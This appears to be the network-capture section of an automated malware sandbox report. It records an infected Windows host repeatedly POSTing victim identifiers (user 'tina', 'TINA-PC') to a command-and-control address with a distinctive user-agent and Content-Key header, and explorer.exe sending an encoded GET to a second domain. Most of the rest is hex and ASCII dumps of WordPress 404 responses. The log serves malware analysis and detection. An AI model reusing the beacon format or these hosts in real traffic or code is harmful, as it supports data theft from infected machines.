                                            May 29, 2024 15:45:31.591519117 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:31.591530085 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:31.591747999 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:45:31.591768026 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            77192.168.2.949792101.36.116.238803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:30.851082087 CEST169OUTGET /dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1
                                            Host: www.top-dao.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            78192.168.2.94979345.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:31.801522970 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:31.806539059 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:34.409621000 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:32 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:34.409681082 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:34.409718037 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:34.409734964 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:34.409753084 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:34.409770012 CEST1120INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:45:34.409789085 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:34.409802914 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:45:34.409821033 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:45:34.409838915 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            79192.168.2.94979445.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:34.630779028 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:34.638835907 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:37.199265957 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:35 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:37.199301004 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:37.199318886 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:37.199336052 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:37.199353933 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:37.199587107 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:37.199604988 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:37.199620962 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:37.199695110 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:45:37.199712038 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            80192.168.2.94979545.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:37.356647015 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:37.361656904 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:39.772905111 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:37 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:39.772947073 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:39.772979975 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:39.773014069 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
